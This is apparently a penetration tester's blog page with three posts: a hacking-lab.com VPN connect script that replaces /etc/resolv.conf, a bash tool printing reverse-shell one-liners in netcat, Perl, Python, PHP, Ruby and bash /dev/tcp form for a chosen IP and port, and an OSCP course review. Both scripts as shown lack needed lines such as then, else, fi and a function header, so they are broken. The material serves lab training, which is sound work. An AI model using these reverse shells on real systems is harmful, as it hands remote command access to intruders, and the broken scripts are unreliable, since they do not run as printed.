Hacking-lab.com VPN connect for Kali,Backtrack [bash]

hacking-labs.com has some really awesome challenges which I am working my way through.

Register  https://www.hacking-lab.com/user/register/ if you have not done so.

The connect script on the site was pretty good but i decided to make a more portable version that checks if the config files exist then if not it downloads all the config files. Runs openVPN in a new window. Then launches the event page as the website page with all the challenges. Forks a new process so that the resolv.conf will keep on being copied then on key press the child process is killed and the old config replaced.

echo "$(tput setaf 2)Welcome to Hacking labs btr5 connect script by dwinfrey v1.1"
if ([[ -a resolv.conf.hacking-lab ]] && [[ -a client.ovpn ]] && [[ -a hlca.crt ]])
echo "All config files exist"
echo "$(tput setaf 1)Error, config files missing, Downloading config files"
wget http://media.hacking-lab.com/largefiles/livecd/z_openvpn_config/backtrack/resolv.conf.hacking-lab
wget http://media.hacking-lab.com/largefiles/livecd/z_openvpn_config/backtrack/client.ovpn
wget http://media.hacking-lab.com/largefiles/livecd/z_openvpn_config/backtrack/hlca.crt
echo "$(tput setaf 2)OpenVPN connection window will open"
echo "Login using your email/password"
gnome-terminal -x openvpn client.ovpn
read -p "Press Enter when successfully connected"
mv /etc/resolv.conf /etc/resolve.conf.back
cp resolv.conf.hacking-lab /etc/resolv.conf
echo "Your resolve.conf has been backed up and new config copied"
echo "Opening Events page"
firefox https://www.hacking-lab.com/events/ &

while [ 0 ]; do
	cp resolv.conf.hacking-lab /etc/resolv.conf
	sleep 60
keep_copying & pid_copy=$!
read -p "Press any enter when you wish to disconnect"
killall openvpn
kill $pid_copy
mv /etc/resolve.conf.back /etc/resolve.conf
echo "Resolv.conf restored, Goodbye"

Reverse shell One-liners all in one bash script

This small script uses the reverse shells from : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

The script will print out all the different one liners for reverse shells using different programming languages.  If no port number is given, it will default to 443.

# v1 one-liner-reverse-shells
# One liners source http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
IP=$1 # assigning variables

# Validating input
if [ $# -eq 1 ]; then
PORT=443 # set Default port
elif [ $# -gt 2 -o $# -lt 1 ]; then
echo -e "Usage: $0 IP PORT, If no port is given default is set to 443"
exit 1

echo "$(tput setaf 1)Netcat Listener: nc -lvp $PORT"
echo "Netcat : nc -e /bin/sh $IP $PORT"
echo $'\n'$(tput setaf 4)
echo 'Perl: perl -e '\''use Socket;$i="'$IP'";$p='$PORT';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'\'''
echo $'\n'$(tput setaf 2)
echo 'Python: python -c '\''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'$IP'",'$PORT'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'\'''
echo $'\n'$(tput setaf 4)
echo 'PHP: php -r '\''$sock=fsockopen("'$IP'",'$PORT');exec("/bin/sh -i <&3 >&3 2>&3");'\'''
echo $'\n'$(tput setaf 1)
echo 'Ruby: ruby -rsocket -e'\''f=TCPSocket.open("'$IP'",'$PORT').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'\'''
echo $'\n'$(tput setaf 7)
echo 'Bash: bash -i >& /dev/tcp/'$IP'/'$PORT' 0>&1'

Comments and suggestions welcome 🙂



Penetration Testing with BackTrack review / OSCP

I really enjoyed the course. The labs have 50 computers, each with a different ways in. The main reason for choosing Penetrating with backtrack over CEH is that CEH is all theory and they can get really boring and I learn much better by doing than reading a text book and watching a few videos.

The course is also good because it gives you around 40% of the material and then the other 60% is all down to you to research and find out. This may seem like a bad point but really it’s the courses big benefit because it makes you do your own research and solve the problems by yourself.

I managed to get into 46 of 50 lab machines which I was pleased about. The course has also given me confidence to not be afraid of failing…you get used to failing the in the labs and you just have to keep trying.
I made the error of downloading and running an exploit without using my own shellcode which rm’d my hard drive..goodbye lab notes. So I had to restart from nothing again after 30days. This was in some ways good as it meant I had a re-fresher on all modules. After that I decided to keep all my notes inside windows using keepnote a backup of my VM daily.

My favourite part of the course was the exam, 24hrs of pressured hacking, I managed to get 2hrs sleep, eat three pizzas and pass the exam. I cannot go into any detail about the exam apart from you will enjoy it if you enjoyed the labs 😀